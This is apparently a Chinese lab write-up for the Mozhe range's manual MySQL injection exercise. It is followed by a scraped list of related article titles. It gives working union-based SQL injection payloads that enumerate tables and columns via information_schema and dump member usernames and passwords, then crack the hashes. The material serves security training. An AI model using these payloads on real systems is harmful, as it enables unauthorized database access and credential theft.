1、先判断是否存在sql注入,使用单引号报错

2、使用and 1=1 正常

and 1=2 报错

3、使用order by判断字段数

4、使用union select判断哪些字符存在注入点

5、使用函数进行信息收集

1、爆破数据库名

直接使用database()函数

2、爆破表名(由上面知数据库的版本为高版本,自带information_achema数据库)

-1 union select 1, 2,group_concat(table_name) ,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

使用group_concat()函数,查询所有的表

3、查询列名

id=-1 union select 1, 2,group_concat(column_name) ,4 from information_schema.columns where table_name='StormGroup_member'

4、爆数据

id=-1 union select 1, 2,group_concat(concat_ws('~',name,password)) ,4 from mozhe_Discuz_StormGroup.StormGroup_member

5、在cmd5解密工具,对加密密码解密

墨者靶场- mysql注入相关推荐

  1. 墨者靶场--手工注入mysql数据库

    跟着小迪老师学习了sql注入,拿个靶场来练习一下自己也算是复习巩固之前学到的东西,下面让我们来一起吃西瓜把 首先我们先进入我们的墨者靶场,嘿嘿嘿 一块墨币还算好 要玩这个靶场主要要明白数据库的结构,和 ...

  2. 墨者学院mysql注入_【墨者学院】:SQL注入漏洞测试(delete注入)

    0x00.题目描述: 背景介绍 最近有人匿名给工程师留言说,感谢他的辛勤付出,把墨者学院建设的这么好,不料激发了工程师对留言板的一波操作,轻松查到了这个人的身份. 实训目标 1.熟练掌握留言板的工作原 ...

  3. 墨者靶场-SQL手工注入漏洞测试(MySQL数据库-字符型)

    0x00 前言 我们都知道,SQL注入分数字型和字符型,我们上次讲的是最基本的数字型SQL注入,这次我们就来讲最基本的字符型SQL注入.同样,如果是明白原理和方法的话,看懂这篇文章并不难,但是如果不清 ...

  4. Pikachu靶场-SQL注入-搜索型注入过关步骤

    Pikachu靶场-SQL注入-搜索型注入过关步骤 首先要明白MySQL数据库模糊搜索的语句,like '常%'.like '%常'.like '%常%' 这个几个,这里就不详说这个语句了 判断注入点 ...

  5. Python全栈(五)Web安全攻防之7.MySQL注入读写文件和HTTP头中的SQL注入

    文章目录 一.MySQL注入读写文件 1.搭建新的测试环境(靶场) 2.读写文件概述 3.读取文件 4.写入文件 二.HTTP头中的SQL注入 1.HTTP头中的SQL注入介绍 updatexml函数 ...

  6. iwebsec靶场 SQL注入漏洞通关笔记4- sleep注入(时间型盲注)

    系列文章目录 iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客 iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)_mooyuan的 ...

  7. concat mysql sql注入_sql注入-mysql注入基础及常用注入语句

    最近在教学中,关于SQL注入,总发现学生理解起来有些难度,其实主要的原因是对各类数据库以及SQL语句不熟悉,今天先介绍mysql注入需要掌握的基础, Mysql内置information_schema ...

  8. MySQL注入中报错的利用

    MySQL注入中报错的利用 在很多的情况 下我们不能直接方便的进行注入,于是有了BENCHMARK延迟注射,如果能得到MySQL的错误信息的话,现在又有了更方便的方法. 网上流传了两三种方法,以前我在 ...

  9. mysql内置变量_详解MySQL注入利用的变量

    MySQL注入数据库时,我们可以利用内置的变量来得到更多的mysql信息,下面就让我们一起来了解MySQL注入利用的变量. 当我们注射mysql库的输入点的时候,可以通过version()/user( ...

最新文章

  1. ElasticSearch配置扩展分词
  2. 记录下帮助一位网友解决的关于android子控件的onTouch或onClick和父OnTouch 冲突的问题。
  3. linux 如何连通网络
  4. 下列哪个工具可以编译java_SUN-Java认证考试题库
  5. java并发编程实战源码_java并发编程实战(附源码)
  6. Java学习手册:JDBC中getString()方法与getObject()方法有什么区别?
  7. unity序列帧优化—Addressables
  8. unity android gyro,Unity3D手机陀螺仪的使用方法
  9. 详细介绍光纤跳线接口类型PC, APC, UPC
  10. 阿里云ECS的1M带宽能干嘛?(详解)
  11. 快速将非Word中的不可编辑的公式转换为Word文档中公式编辑器里可编辑的公式的办法
  12. 开箱 | 小度智能音箱初体验
  13. 个人面试问答题知识库(一)百面机器学习篇
  14. 自编剧本——爱上坑神姐姐的少女(很H很暴力)
  15. linux一次三行显示文件内容,Linux 命令合集(二):查看文件及内容处理命令
  16. 基于SeedUbuntu16.04的缓冲区溢出实验
  17. 【论文解读】手术机器人系统的工作原理分析与解读
  18. 高空抛物检测方案设计(使用SOM进行轨迹分类)
  19. 软件内部更新,出现“解析包时出现问题”的错误后停止
  20. Python魔法方法指南

热门文章

  1. 【详细齐全】FIO使用方法 及参数解析(文章末尾)
  2. git flow工作流
  3. NLP入门:word2vec self-attention transformer diffusion的技术演变
  4. chatgpt接入微信公众号的详细教程
  5. gorm 关于mysql你确定知道这些?
  6. Java实现冒泡排序详细代码
  7. 闪店空间官网-创意优质快闪店,店中店专家
  8. CV 经典主干网络 (Backbone) 系列: ResNet变种
  9. LORA无线远传水表VS普通机械水表
  10. Windows Server 2012 R2设置域控密码永不过期